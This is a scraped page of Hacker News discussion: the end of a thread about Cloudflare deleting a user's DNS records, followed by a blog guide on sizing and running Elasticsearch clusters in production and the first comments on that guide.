You guys are the worst censors even on your own blog. Any criticism toward your CEO or the way things have been done, completely out of integrity with your own policies in the past (such as cutting out providers because your CEO woke up self-righteous on the wrong foot that day) gets moderated away or not even admitted to the CF blog.

You've screwed up so many times, I am surprised by now more people aren't onto your tired antics. Thankfully, you cannot delete this post - perhaps many fanboys will downgrade it, but at least I can tell you how I feel.

rswail(10000) about 11 hours ago [-]

Having the CTO offer up support in this way is heartening. Especially because infrastructure suppliers are getting more and more centralized, which leads to possible SPOFs even with individual company distributed environments.

AndrewWarner(734) about 12 hours ago [-]

He gave me an incredibly detailed and fast response to an issue I was fact-checking.

paulddraper(4100) about 22 hours ago [-]

Please do update if possible.

It's likely a good learning for all.

andrewstuart(999) about 21 hours ago [-]

I've put this idea forward a number of times here on HN in regards to other big tech companies.

Technology companies need an 'ombudsman' - a contact that customers can go to when the normal tech support processes have failed.

The Ombudsman must not be part of the technology companies ordinary support processes, it must be entirely separate, and have highest level authority to demand action within the company.

To avoid the Ombudsman being overused, you could give it a price of say $20, which is always refunded when the case is resolved.

HN constantly has front page posts from people for whom big tech companies have support processes have failed but there is simply no other recourse unless you have 'a friend in the business'.

It just doesn't work to have some random Cloudflare person offer their email address as some post disaster issue resolution process on social media. Formalise it with an official Ombudsman and maybe then companies like Cloudflare might avoid HN front page bad publicity.

I had an issue at 'one of the biggest tech companies' that went on for days and days in which tech support kept telling me I had set up something wrong, until eventually I emailed one of the top managers who I happen to 'know' at that company - it was fixed within hours. That 'contact a friend in the business who can actually get things done' is a necessary part of a large support organisation and it simply does not exist yet in any tech company that I know of.

rationalfaith(10000) about 22 hours ago [-]

You better add redundancies here on untracked transactions on your DNS record ledger.

iudqnolq(3915) about 22 hours ago [-]

OP here.

You can post updates with any relevant information. Probably goes without saying, but if the issue has to do with my billing or address please don't post specific details without asking me first.

I will link to this comment from TFA for verification. (Edit: added to the bottom. If you need more verification you have my email.)

Edit2: I see that the domain is back in my account and listed as 'Pending Nameserver Update'. I don't think that's because of something I did.

jiggawatts(10000) about 19 hours ago [-]

Please explain something to me.

For me and my of my customers, having your 'entire cloud deleted' is like... the #1 nightmare scenario.

So why does this capability/function even exist for active accounts at CloudFlare? It sounds like the OP fell victim to what is essentially a regular process.

Or to put it another way: No amount of explanation or assurance is ever going to make me feel comfortable with my doctor having a handgun as one of his medical instruments.

diegoperini(4218) about 20 hours ago [-]

First, you are awesome, really :)

Second, a bunch of honest questions:

Did you consult to your supervisor (or anyone with authority) to be able to bypass the support process (if there is any) like this? If so what was the response? If the response was negative, how did you convince people? After things resolve, can you kindly post how many spam or unrelated emails you receive so that it will be an example to the industry?

I'd like to put my skepticism on hold and blindly believe that your post is a reflection of pure concern and not just a PR stunt for damage control.

rattray(4185) about 20 hours ago [-]

Context for the lazy, jgrahamc is the longtime CTO of Cloudflare.

ajonit(4231) about 18 hours ago [-]

Now that the OP has given a go ahead to go public, We will eagerly wait for your update jgc

gist(2274) about 21 hours ago [-]

> BTW If you, dear reader, ever find yourself so frustrated with Cloudflare that you feel like your only recourse is a blog post... my email is [email protected] and I'm happy to hear from people.

I know that people will think it's great that you are doing this and I also know that you think it's good (for you) to have a feel for the issues that frustrate every day users. But I think it's not a great use of a company execs time and I am not even sure it's a good way to deploy resources at Cloudflare.

The reason is people will tend to (as a rule) do as little as they can themselves but then use as a hammer the court of public opinion to get something resolved.

You say 'ever find yourself so frustrated with Cloudflare' but you know that in itself is different for different people. What will happen is you will get people using you as a help desk and then after you don't help them as quickly as they think you should they will then follow up with a post, comment or story about how you did nothing.

Separately if someone is posting publicly about an issue (as this person is) and if you can verify that it's actually coming from the customer (I mean who says it is actually?) I don't think you need them to say it's ok to resolve online. In fact to me it's the opposite. You take the time to reach out publicly and you take what follows good or bad even calling you out (the customer yes you can do that by the way) if you think they didn't put the appropriate effort into finding an answer.

johnklos(10000) about 23 hours ago [-]

Is it really all that surprising when a big company that claims to be good but hosts phishing content in the name of free speech does whatever they want, including breaking things and not explaining why?

I don't trust Cloudflare one bit, and I think everyone should question whether their attempt to re-centralize everything is beneficial to the planet.

There are two major problems here: one, the problem itself, which is the deletion of DNS for apparently no good reason, and two, which is the bigger problem, is that it's incredibly difficult to talk to a human about what happened, so there's no assurance it won't happen again.

If people want things to be reliable, we've got to stop using companies with which we cannot communicate.

djsumdog(840) about 23 hours ago [-]

Does OP have a free account with just DDOS protection. Does a paid account still have the notice to ask in the community forums first?

ocdtrekkie(2833) about 23 hours ago [-]

IMHO (and I know the parent post includes significant difficulties getting back out of Cloudflare), services like Cloudflare may be crucial to decentralization. I can't deal with something like my blog post being frontpaged on HN if my website is hosted in my house, unless I have a good CDN.

As a self-hosting enthusiast, something like Cloudflare is one of the best chances of having a plan that competes with 'just hosting it in the cloud'.

djsumdog(840) about 23 hours ago [-]

I really had a strong dislike for Cloudflare after they banned certain customers for political reasons[1]. The CEO mentioned how maybe it wasn't the right thing to do .. and then they did it again.

There aren't really any self-hosted solutions for DDoS protection like Cloudflare since it requires things happening in the network layer. Implementing a solution would require access to monitor and reshape the local network, but I'm glad to see companies like Linode and DO offering DDos package.

I want to start running my own DNS-over-HTTPS server as well, so I can pump firefox DNS requests to a self-hosted solution and not to Google or Cloudflare. I really don't trust them and am having trouble understanding why so many other people do.

[1]: https://battlepenguin.com/politics/the-new-era-of-corporate-...

craftinator(10000) about 20 hours ago [-]

If you run a restaurant, you can refuse to do business with anyone you choose. If that was not the case, you would effectively be a slave; unable to choose actions for yourself and your business. Cloudflare refused to do business with people and content; that is their prerogative.

lexicality(10000) about 23 hours ago [-]

While there are a lot of reasons not to trust cloudflare, the fact that they stopped hosting nazis and pedophiles doesn't seem like a good one to open with imo

dana321(10000) about 23 hours ago [-]

Cloudflare. A great solution if you want nobody to be able to easily access your website.

wackget(10000) about 22 hours ago [-]

What are some alternatives which offer DDOS/flood/spam protection?

iudqnolq(3915) about 23 hours ago [-]

OP here. My website wasn't up when this happened because of some yak shaving, but when it is I disable DDOS protection. I was only using Cloudflare for domain registration and DNS.

I don't think I have ethical issues with DDOS protection in general, but as someone who browses using Firefox on Linux with tracking blocking I know how annoying it can get. If I don't need it why bother? Plus I generally like to minimize opaque layers in my 'stack'.

tus88(10000) about 23 hours ago [-]

The ultimate website blocker.

RcouF1uZ4gsC(4119) about 23 hours ago [-]

Be wary of being part of something that is a cost center for the company instead of a profit center.

CloudFlare is selling domains at cost. That means they are not making any money from being a domain registrar, which means they will do everything to keep the cost of doing it as low possible to themselves. This means lack of customer service and use of ML dragnets for 'anomalous' behavior.

owenmarshall(10000) about 22 hours ago [-]

.com has a price floor of $7.85. Most registrars seem to target anywhere from the $9.99 - $14.99 range for registration because, as far as I can tell, there is no real differentiation outside of price.

Sure, I could spend $lots to get a dedicated account rep from MarkMonitor or CSC but that's not really feasible for my personal site.

Are there really any registrars that hit a reasonable price point for individuals and offer service beyond bargain basement? Because if so I'm doing some transfers this weekend.

judge2020(4263) about 23 hours ago [-]

Can't think of a reason this domain was touched (I don't work for CF) but I'd recommend reading the threads related to this search:

https://community.cloudflare.com/search?q=127.0.0.1%20audit

Every related incident seems to be due to either nameservers temporarily/incidentally chanced away from CF (and CF's service not re-checking it perhaps) or the registration billing failing (which doesn't look to be the case since registration expires 2021[0]). The latest change to the domain was about a week ago[0], so if that was when it was transferred to CF, it might be the first scenario.

> Because Cloudflare deleted my domain registration I can't change the status from clientTransferProhibited through their dashboard so I don't think I can even leave.

Unless something else happened, deleting the zone from your account doesn't affect the registration. Re-adding the domain will instantly allow you to view the registration info and likely transfer away; this would only not work if the zone is banned for some reason.

0: https://who.is/whois/danielzfranklin.org

crooked-v(4308) about 22 hours ago [-]

> Re-adding the domain will instantly allow you to view the registration info

'Your domain registration configuration depends on your DNS zone configuration' is a very strange way to do things.

iudqnolq(3915) about 22 hours ago [-]

OP here.

> Every related incident seems to be due to either nameservers temporarily/incidentally chanced away from CF (and CF's service not re-checking it perhaps) or the registration billing failing (which doesn't look to be the case since registration expires 2021[0]).

The changes a week ago involves adding and deleting TXT and A records only. Cloudflare manages the nameservers I use as my registrar and I never changed them from the default. I just confirmed all of that in the Cloudflare audit log.

> Unless something else happened, deleting the zone from your account doesn't affect the registration. Re-adding the domain will instantly allow you to view the registration info and likely transfer away; this would only not work if the zone is banned for some reason.

Thank you so much! Trying that now.

Paul-ish(4241) about 22 hours ago [-]

> However, I'm unable to log in to their community forum. When I click the login button I'm redirected to my dashboard, and when I then click Support on the dashboard I'm redirected back to the forum without being logged in. I suppose it's possibly an issue with Firefox blocking cookies (although I disabled tracking prevention) so it's possible this part is partly a problem on my end.

I'm into issues like this more and more, where you run into some strange behavior on a website and you wonder 'How did this ever make it into production?', then you open the website in Chrome and the flows work fine. I worry that Firefox is becoming less and less viable.

_def(10000) about 21 hours ago [-]

If a service doesn't function properly without tracking I wouldn't blame it on a privacy respecting browser.

mark_and_sweep(10000) about 21 hours ago [-]

This is not Firefox becoming less and less viable. This is developers caring less and less about supporting older browsers, less capable hardware and, I guess, long-term maintenance in general.

Just had a similar case today: My Mom tried to order something online on her old Android tablet - and it didn't work. She blamed the tablet for it, saying 'It's just too old, it doesn't work correctly anymore! I used to be able to order stuff on this website'. I had to explain to her that her tablet is still working fine, it's just the website that is broken because it's not supporting her device (or browser) anymore. Shockingly, she listed quite a few websites, which she has used for years, which have stopped working for her in the past few months and years; all of these she mentioned as evidence that the problem must be her tablet - not the websites. When I opened two of the sites she mentioned, I wasn't too surprised to find very shiny, very modern single-page applications (with service workers registered and even WebAssembly used on one of them)..

So when you are creating a modern web app, please don't just test in Chrome on your new MacBook Pro. Think about your Mom. Ask yourself: 'Is this still gonna work on her crappy old device?'

dariusj18(10000) about 22 hours ago [-]

Cloudflare once deleted one of my domains because the NS records were set in the wrong order.

jlgaddis(2975) about 21 hours ago [-]

Wrong order? Since when do NS RRs have to be in any certain order?

LinuxBender(150) about 22 hours ago [-]

What do you mean by wrong order? Do you mean the NS records in the zone file were after a delegation / referral? What RFC was your zone breaking?

whatthesmack(10000) about 23 hours ago [-]

This is frightening. I just started the process of moving all ~60 of my domains from Amazon Registrar + Google Cloud DNS to Cloudflare, and will definitely wait until somebody from Cloudflare chimes in here to clarify what's going on.

Jerry2(98) about 22 hours ago [-]

> moving all ~60 of my domains from Amazon Registrar + Google Cloud DNS to Cloudflare

You're very brave considering that Cloudflare doesn't even have U2F yet Google and Amazon do.

flurdy(4191) about 22 hours ago [-]

Don't put all your eggs in one basket, ie. don't just use one provider.

Also for your core domains, do not let the registrar and dns provider be the same entity.

Also, don't decide on not migrating just because of one bad experience. None of them are perfect, though vigilance is wise.

(I know am probably preaching to the choir :) )

iudqnolq(3915) about 22 hours ago [-]

OP here. I'm considering moving to Amazon Registrar. Why are you leaving?

freedomben(2733) about 22 hours ago [-]

I've been planning too soon, am also now going to wait to see where this goes. DNS is obviously a critical system and I don't know if I can trust Cloudflare now. I'm not a big fish that can make noise. I'm an easy victim.

dvno42(4311) about 23 hours ago [-]

Funny that this is coming up. I just transferred over from Namecheap to Cloudflare a few days ago and had a similar issue. One of my A records (out of about 20) were missing after the transfer.

iudqnolq(3915) about 23 hours ago [-]

I noticed that if you don't unfocus the input field by focusing somewhere else on the page it may not save. That may be what happened to you.

oefrha(4141) about 23 hours ago [-]

Unrelated issue but sometimes Cloudflare docs/communications are not in sync with their actual system which is immensely frustrating. I was bitten a few times.

For instance, a while back I forgot to renew one of my side project domains so it briefly expired for maybe a day or two. Got this email from Cloudflare saying

> Your DNS records will be completely removed from our system in 7 days.

> ...

> Once you have completed this change, click the "Recheck Nameservers" button in your Cloudflare dashboard to ensure your domain stays active on Cloudflare.

I promptly renewed, except there's no 'Recheck Nameservers' button anywhere, and the dashboard still read 'Moved' for maybe a day. Eventually the problem was just gone, but the communication worried me that entire time.

(I do appreciate Cloudflare's service, though.)

outworlder(3729) about 22 hours ago [-]

> Your DNS records will be completely removed from our system in 7 days.

This sounds like a plot of a japanese horror movie.

fernandotakai(3604) about 23 hours ago [-]

as much as i like cloudflare (and i like them a lot), it's kind of absurd that this kind of thing can happen. a lot of red flags that, if true, would mean that their infrastructure require a lot more care (127.0.0.1 as the source of an audit event? no email when DNS records are deleted? no 1-to-1 message due to this happening?).

ocdtrekkie(2833) about 23 hours ago [-]

At the very least, this sort of lack of good process is definitely what happens when Google decides to cut you off (and another person just commented a similar experience with Amazon), but I suspect it's likely the case for a much larger number of companies and services than people realize. It's fundamental internet architecture, and often little more thought goes into account termination than what you'd do to ban someone from your mid-2000s phpBB forum.

So much business focus goes into the onboarding experience, and since you assume all of the people your service terminates are 'probably bad people anyways', not a lot of thought goes into offboarding, or ideally, appeals.

thedanbob(10000) about 23 hours ago [-]

I had an issue with them recently where a SRV record pointing to "." (meaning "service unavailable") was being rewritten to the string "false". It didn't take them too long to fix it, but it made me wonder how they managed to push a bug like that to production without some sort of automated test catching it.

daenz(578) about 23 hours ago [-]

This happened to me with AWS somewhat recently[0], and I never found out exactly what happened. I just chalk it up to some dev made a mistake and didn't tell anyone. It's pretty alarming when things like this happen though.

0. https://news.ycombinator.com/item?id=21326014

jcrites(4212) about 21 hours ago [-]

I've been involved in using Route 53 to manage thousands of DNS zones, and haven't come across something like that. I'd recommend putting in a support request via the account that was affected to ensure that it gets looked at.

If you haven't already, you might consider checking the CloudTrail logs for the account in question to see if there were any API commands related to the zone.

use-net(10000) about 22 hours ago [-]

cloudns.net does it a bit more customer-friendly way:

they e-mailed me saying they deleted some domains not because some entries were broken or had problematic entries, but just because it was 'underused', i.e. too few DNS resolve calls. So the tiny data packets in their nameserver caused them unnecessary consumption of electricity or whatever. Very compelling! This is how they do business these days.

They bombarded people with all sorts of useless info, but not about this policy of theirs. Makes you feel very much like the proverbial 'valued customer'.

Everything is going downhill in this century, that's a fact.

MrStonedOne(10000) about 15 hours ago [-]

Edit: the dns record export/import functionality is hidden behind the advance search drop down for some reason. Ignore this entire comment.

From reading the linked helpdoc, apparently your entire domain can get removed from cloudflare if your register stops reporting cloudflare's servers for the ns records.

The mere idea of having to re-enter all hundred or so of our dns records using cloudflares 1.2 second delay at every step of the way add dns record interface because namecheap bugged out for a few seconds is horrifying.

There is no way to export all of these, there is no way to import or mass add and i don't think they can lean on the api to save them here.

Dns records are data, dns records are sometimes important unbacked up customer data. Cloudflare does not offer a way for customers to back this data up, nor a way to restore or recover from a backup but it acts very callous with this data, deleting it in automated systems based on data from 3rd party providers.

Not a good look.

Hello71(4144) about 15 hours ago [-]

I googled 'cloudflare dns import' and 'cloudflare dns export' and the first result both times was an apparently official support article giving step-by-step instructions on how to do so. I myself have used this function about six years ago, so this is not new or untested functionality.

donmcronald(10000) about 15 hours ago [-]

You can export a zone file and the auto deletion takes days. You're site would be offline before the zone gets deleted. I don't like it a ton, but it's not even close to what you're saying.

gist(2274) about 22 hours ago [-]

> Does anyone know what might have caused Cloudflare to delete my domain? Any ideas for how I could transfer my domain away from Cloudflare sooner?

I don't get the point of 'shoot first ask questions later' type approach. Obviously it would pay to get some kind of affirmative reply from Cloudflare prior to a post which everyone here with incomplete information speculates and wastes time on (like I am doing).

Also Cloudflare did not 'delete my (the) domain. It deleted the dns records. There is a difference and no I am not being pedantic either. How would 'the internet' know why this was done there could be any number of good or bad reasons.

Lastly the domain is not expired and as such the registrar is required (per ICANN) to supply an auth code so someone can transfer out. Or to allow the customer to change the primary and secondary dns to another dns provider. There is zero (legitimately) that allows cloudflare as either a dns provider or a registrar to lock the domain up pretty much (other than for a legal court order) just for some reason they might decide to do that.

johnklos(10000) about 21 hours ago [-]

> I don't get the point of 'shoot first ask questions later' type approach.

At first I thought you were talking about Cloudflare shooting first, but apparently not.

iudqnolq(3915) about 22 hours ago [-]

OP here.

> Also Cloudflare did not 'delete my (the) domain. It deleted the dns records. There is a difference and no I am not being pedantic either.

Thanks. You're absolutely right. I meant delete their record of the domain as it shows up in the UI of their dashboard.

> How would 'the internet' know why this was done there could be any number of good or bad reasons.

For many reasons luckily HN isn't 'the internet'. I've already gotten some good suggestions.

> Lastly the domain is not expired and as such the registrar is required (per ICANN) to supply an auth code so someone can transfer out. Or to allow the customer to change the primary and secondary dns to another dns provider. There is zero (legitimately) that allows cloudflare as either a dns provider or a registrar to lock the domain up pretty much (other than for a legal court order) just for some reason they might decide to do that.

I know. Again, I guess I was insufficiently specific. Cloudflare has warned me to expect long wait times before I can talk to a customer support rep. My question was if there's a way to transfer out without needing to wait on a slow support loop.

isclever(10000) about 22 hours ago [-]

My takeaway:

1. Setup up monitoring on your critical domains. UptimeRobot and Hetrixtools are good starters with generous free tier. You should know when your website/email/dns isn't working.

2. Don't tie your domain registration with your DNS provider. You lose everything if something goes wrong with your account.

3. Be able to jump ship easily, have backups of your zone, already know where you will transfer to.

djsumdog(840) about 22 hours ago [-]

> UptimeRobot and Hetrixtools are good starters with generous free tier

Are there any open source status pages/monitor programs that have build-in checks for HTTPS, DNS records (ipv4/6), arbitrary port checks, etc? I'd rather just setup a status page/alert app on a $5 minimal DO/Vultr node and self-host/support/contribute to a FOSS program than use a commercial provider.

iudqnolq(3915) about 22 hours ago [-]

> Setup up monitoring on your critical domains. UptimeRobot and Hetrixtools are good starters with generous free tier. You should know when your website/email/dns isn't working.

Lesson learned :)

> Don't tie your domain registration with your DNS provider. You lose everything if something goes wrong with your account.

I don't see how that helps. How do I recover from my registrar deleting/disabling my account even if DNS is somewhere else? I think there's still only one failure point and the lesson is that I need to pay that failure point more money.

> Be able to jump ship easily, have backups of your zone,

Luckily I have that

> already know where you will transfer to.

Any suggestions? Ironically I recently moved from Google Domains to Cloudflare because I was worried about issues with opaque support. I've learned my lesson picking based on cost alone, but I'm a college student who can't afford something too heavy-duty.

throwawaydns101(10000) about 23 hours ago [-]

DNS has become frighteningly unreliable. Here are previous stories that show how it is possible to lose access to your domain for no fault of yours:

(1) https://news.ycombinator.com/item?id=21700139 - Sinkholed

(2) https://news.ycombinator.com/item?id=19322966 - I lost my domain and everything that goes with it

No different than this story where the author's DNS records were deleted because of so called 'anomaly'.

Here are so many more stories: https://news.ycombinator.com/item?id=21710939

DNS was a good idea but now there are organizations that have the power to arbitrarily take control and even remove your domain names and records. We really need to come up with a peer-to-peer solution and take back control of the naming system from these authorities.

Defenestresque(10000) about 21 hours ago [-]

>DNS has become frighteningly unreliable. Here are previous stories that show how it is possible to lose access to your domain for no fault of yours:

The second story you posted is about a user who forgot to renew their domain and did not wish to pay the overly-inflated fee to re-register it while it was in the grace period.

I hold no love for any registrar that jacks up rates for getting back an expired domain and agree that they should have sent a reminder email, but describing this as someone 'losing their domain through no fault of their own' is, frankly, incredibly misleading.

The user:

1) forgot to renew their domain 2) had full right to recover their domain but objected to the price 3) had full right to transfer the domain out to another registrar for the original 15EUR price and 4) eventually got back full control of the domain

nathancahill(2861) about 23 hours ago [-]

Odd comment to make a throwaway for, not very controversial (unless you work for Cloudflare?)

Legogris(4307) about 22 hours ago [-]

I looked into self-hosting DNS and it doesn't seem like that big of a deal as long as you can ensure uptime to be honest. If you set up the two first on different hosts and possibly have #3/4 being cloud providers I think you're pretty good.

Does anyone here have experience with running their own DNS servers for their domains?





Historical Discussions: Guide to running Elasticsearch in production (February 23, 2020: 642 points)

(669) Guide to running Elasticsearch in production

669 points 2 days ago by thunderbong in 2272nd position

facinating.tech | Estimated reading time – 16 minutes | comments | anchor

If you are here, I do not need to tell you that Elasticsearch is awesome, fast and mostly just works. If you are here, I also do not need to tell you that Elasticsearch can be opaque, confusing, and seems to break randomly for no reason. In this post I want to share my experiences and tips on how to set up Elasticsearch correctly and avoid common pitfalls. I am not here to make money so I will mostly just jam everything into one post instead of doing a series. Feel free to skip sections.

The basics: Clusters, Nodes, Indices and Shards

If you are really new to Elasticsearch (ES) I want to explain some basic concepts first. This section will not explain best practices at all, and focuses mainly on explaining the nomenclature. Most people can probably skip this.

Elasticsearch is a management framework for running distributed installations of Apache Lucene, a Java-based search engine. Lucene is what actually holds the data and does all the indexing and searching. ES sits on top of this and allows you to run potentially many thousands of lucene instances in parallel.

The highest level unit of ES is the cluster. A cluster is a collection of ES nodes and indices.

Nodes are instances of ES. These can be individual servers or just ES processes running on a server. Servers and nodes are not the same. A VM or physical server can hold many ES processes, each of which will be a node. Nodes can join exactly one cluster. There are different Types of node. The two most interesting of which are the Data Node and the Master-eligible Node. A single node can be of multiple types at the same time. Data nodes run all data operations. That is storing, indexing and searching of data. Master -eligible nodes vote for a master that runs the cluster and index management.

Indices are the high-level abstraction of your data. Indices do not hold data themselves. They are just another abstraction for the thing that actually holds data. Any action you do on data such as INSERTS, DELETES, indexing and searching run against an Index. Indices can belong to exactly one cluster and are comprised of Shards.

Shards are instances of Apache Lucene. A shard can hold many Documents. Shards are what does the actual data storage, indexing and searching. A shard belongs to exactly one node and index. There are two types of shards: primary and replica. These are mostly the exact same. They hold the same data, and searches run against all shards in parallel. Of all the shards that hold the same data, one is the primary shard. This is the only shard that can accept indexing requests. Should the node that the primary shard resides on die, a replica shard will take over and become the primary. Then, ES will create a new replica shard and copy the data over.

At the end of the day, we end up with something like this:

A more in-depth look at Elasticsearch

If you want to run a system, it is my belief that you need to understand the system. In this section I will explain the parts of Elasticsearch I belief you should understand if you want to manage it in production. This will not have any recommendations in it those come later. Instead it aims purely at explaining necessary background.

Quorum

It is very important to understand that Elasticsearch is a (flawed) democracy. Nodes vote on who should lead them, the master. The master runs a lot of cluster-management processes and has the last say in many matters. ES is a flawed democracy because only a subclass of citizens, the master-eligible nodes, are allowed to vote. Master-eligible are all nodes that have this in their configuration:

node.master: true

On cluster start or when the master leaves the cluster, all master-eligible nodes start an election for the new master. For this to work, you need to have 2n+1 master-eligible nodes. Otherwise it is possible to have a split-brain scenario, with two nodes receiving 50% of the votes. This is a split brain scenario and will lead to the loss of all data in one of the two partitions. So don't have this happen. You need 2n+1 master-eligible nodes.

How nodes join the cluster

When an ES process starts, it is alone in the big, wide world. How does it know what cluster it belongs to? There are different ways this can be done. However, these days the way it should be done is using what is called Seed Hosts.

Basically, Elasticsearch nodes talk with each other constantly about all the other nodes they have seen. Because of this, a node only needs to know a couple other nodes initially to learn about the whole cluster. Lets look at this example of a three node cluster:

Initial state.

In the beginning, Node A and C just know B. B is the seed host. Seed hosts are either given to ES in the form of a config file or they are put directly into elasticsearch.yml.

Node A connects and exchanges information with B

As soon as node A connects to B, B now knows of the existence of A. For A, nothing changes.

Node C connects and shares information with B

Now, C connects. As soon as this happens, B tells C about the existence of A. C and B now know all nodes in the cluster. As soon as A connects to B again, it will also learn of the existence of C.

Segments and segment merging

Above I said that shards store data. This is only partially true. At the end of the day, your data is stored on a file system in the form of.. files. In Lucene, and with that also Elasticsearch, these files are called Segments. A shard will have between one and multiple thousand segments.

Again, a segment is an actual, real file you can look at in the data directory of your Elasticsearch installation. This means that using a segment is overhead. If you want to look into one, you have to find and open it. That means if you have to open many files, there will be a lot of overhead. The problem is that segments in Lucene are immutable. That is fancy language for saying they are only written once and cannot be changed. This in turn means that every document you put into ES will create a segment with only that single document in it. So clearly, a cluster that has a billion documents has a billion segments which means there are a literal billion files on the file system, right? Well, no.

In the background, Lucene does constant segment merging. It cannot change segments, but it can create new ones with the data of two smaller segments.

This way, lucene constantly tries to keep the number of segments, which means the number of files, which means the overhead, small. It is possible to force this process by using a force merge.

Message routing

In Elasticsearch, you can run any command against any node in a cluster and the result will be the same. That is interesting because at the end of the day a document will live in only one primary shard and its replicas, and ES does not know where. There is no mapping saying a specific document lives in a specific shard.

If you are searching, then the ES node that gets the request will broadcast it to all shards in the index. This means primary and replica. These shards then look into all their segments for that document.

If your are inserting, then the ES node will randomly select a primary shard and put the document in there. It is then written to that primary shard and all of its replicas.

So how do I run Elasticsearch in production?

Finally, the practical part. I should mention that I managed ES mostly for logging. I will try to keep this bias out of this section, but will ultimately fail.

Sizing

The first question you need to ask and subsequently answer yourself, is about sizing. What size of ES cluster do you actually need?

RAM

I am talking about RAM first, because your RAM will limit all other resources.

Heap

ES is written in Java. Java uses a heap. You can think of this as java-reserved memory. There is all kind of stuff that is important about heap which would triple this document in size so I will get down to the most important part which is heap size.

Use as much as possible, but no more than 30G of heap size.

Here is a dirty secret many people don't know about heap: every object in the heap needs a unique address, an object pointer. This address is of fixed length, which means that the amount of objects you can address is limited. The short version of why this matters is that at a certain point, Java will start using compressed object pointers instead of uncompressed ones. That means that every memory access will have additional steps involved and be much slower. You 100% do not want to get over this threshold, which is somewhere around 32G.

I once spend an entire week locked into a dark room doing nothing else but using esrally to benchmark different file systems, heap sizes, FS and BIOS settting combinations of Elasticsearch. Long story short here is what it had to say about heap size:

Index append latency, lower is better

The naming convention is fs_heapsize_biosflags. As you can see, starting at 32G of heap size performance suddenly starts getting worse. Same with throughput:

Index append median throughput. Higher is better.

Long story short: use 29G of RAM or 30 if you are feeling lucky, use XFS, and use hardwareprefetch and llc-prefetch if possible.

FS cache

Most people run Elasticsearch on Linux, and Linux uses RAM as file system cache. A common recommendation is to use 64G for your ES servers, with the idea that it will be half cache, half heap. I have not tested FS cache. However, it is not hard to see that large ES clusters, like for logging, can benefit greatly from having a big FS cache. If all your indices fit in heap, not so much.

CPU

This depends on what you are doing with your cluster. If you do a lot of indexing, you need more and faster CPUs than if you just do logging. For logging, I found 8 cores to be more than sufficient, but you will find people out there using way more since their use case can benefit from it.

Disk

Not as straightforward as you might think. First of all, if your indices fit into RAM, your disk only matters when the node is cold. Secondly, the amount of data you can actually store depends on your index layout. Every shard is a Lucene instance and they all have memory requirement. That means there is a maximum number of shards you can fit into your heap. I will talk more about this in the index layout section.

Generally, you can put all your data disks into a RAID 0. You should replicate on Elasticsearch level, so losing a node should not matter. Do not use LVM with multiple disks as that will write only to one disk at a time, not giving you the benefit of multiple disks at all.

Regarding file system and RAID settings, I have found the following things:

  • Scheduler: cfq and deadline outperform noop. Kyber might be good if you have nvme but I have not tested it
  • QueueDepth: as high as possible
  • Readahead: yes, please
  • Raid chunk size: no impact
  • FS block size: no impact
  • FS type: XFS > ext4

Index layout

This highly depends on your use case. I can only talk from a logging background, specifically using Graylog.

Shards

Short version:

  • for write heavy workloads, primary shards = number of nodes
  • for read heavy workloads, primary shards * replication = number of nodes
  • more replicas = higher search performance

Here is the thing. If you write stuff, the maximum write performance you can get is given by this equation:

node_throughput*number_of_primary_shards

The reason is very simple: if you have only one primary shard, then you can write data only as quickly as one node can write it, because a shard only ever lives on one node. If you really wanted to optimize write performance, you should make sure that every node only has exactly one shard on it, primary or replica, since replicas obviously get the same writes as the primary, and writes are largely dependent on disk IO. Note: if you have a lot of indexing this might not be true and the bottleneck could be something else.

If you want to optimize search performance, search performance is given by this equation:

node_throughput*(number_of_primary_shards + number_of_replicas)

For searching, primary and replica shards are basically identical. So if you want to increase search performance, you can just increase the number of replicas, which can be done on the fly.

Size

Much has been written about index size. Here is what I found:

30G of heap = 140 shards maximum per node

Using more than 140 shards, I had Elasticsearch processes crash with out-of-memory errors. This is because every shard is a Lucene instance, and every instance requires a certain amount of memory. That means there is a limit for how many shards you can have per node.

If you have the amount of nodes, shards and index size, here is how many indices you can fit:

number_of_indices = (140 * number_of_nodes) / (number_of_primary_shards * replication_factor)

From that and your disk size you can easily calculate how big the indices have to be

index_size = (number_of_nodes * disk_size) / number_of_indices

However, keep in mind that bigger indices are also slower. For logging it is fine to a degree but for really search heavy applications, you should size more towards the amount of RAM you have.

Segment merging

Remember that every segment is an actual file on the file system. More segments = more overhead in reading. Basically for every search query, it goes to all the shards in the index, and from there to all the segments in the shards. Having many segments drastically increases read-IOPS of your cluster up to the point of it becoming unusable. Because of this it's a good idea to keep the number of segments as low as possible.

There is a force_merge API that allows you to merge segments down to a certain number, like 1. If you do index rotation, for example because you use Elasticsearch for logging, it is a good idea to do regular force merges when the cluster is not in use. Force merging takes a lot of resources, and will slow your cluster down significantly. Because of this it is a good idea to not let for example Graylog do it for you, but do it yourself when the cluster is used less. You definitely want to do this if you have many indices though. Otherwise, your cluster will slowly crawl to a halt.

Cluster layout

For everything but the smallest setups it is a good idea to use dedicated master-eligible nodes. The main reasons is that you should always have 2n+1 master-eligible nodes to ensure quorum. But for data nodes you just want to be able to add a new one at any time, without having to worry about this requirement. Also, you don't want high load on the data nodes to impact your master nodes.

Finally, master nodes are ideal candidates for seed nodes. Remember that seed nodes are the easiest way you can do node discovery in Elasticsearch. Since your master nodes will seldomly change, they are the best choice for this, as they most likely already know all other nodes in the cluster.

Master nodes can be pretty small, one core and maybe 4G of RAM is enough for most clusters. As always, keep an eye on actual usage and adjust accordingly.

Monitoring

I love monitoring, and I love monitoring Elasticsearch. ES gives you an absolute ton of metrics and it gives you all of them in the form of JSON, which makes it very easy to pass into monitoring tools. Here are some helpful things to monitor:

  • number of segments
  • heap usage
  • heap GC time
  • avg. search, index, merge time
  • IOPS
  • disk utilization

Conclusion

After around 5 hours of writing this, I think I dumped everything important about ES that is in my brain into this post. I hope it saves you many of the headaches I had to endure.

Resources

https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-node.html https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-discovery-quorums.html https://github.com/elastic/rally https://tech.ebayinc.com/engineering/elasticsearch-performance-tuning-practice-at-ebay/




All Comments: [-] | anchor

animalnewbie(10000) 2 days ago [-]

Is there a non-Java alternative to this ES/Logstash stuff? Preferably rust or a native lang, but okay with CLR too. I'm not comfortable running Java in production after previous memory issues...

rjkennedy98(10000) 2 days ago [-]

MarkLogic is an alternative, but it isn't free.

staticautomatic(4217) 2 days ago [-]

Couchbase could be a reasonable alternative, depending upon your requirements. Couchbase is written in Erlang iirc and Couchbase's indexing is written in Go.

BossingAround(4110) 2 days ago [-]

You should give it another try. New versions of Java have made great progress in the memory area.

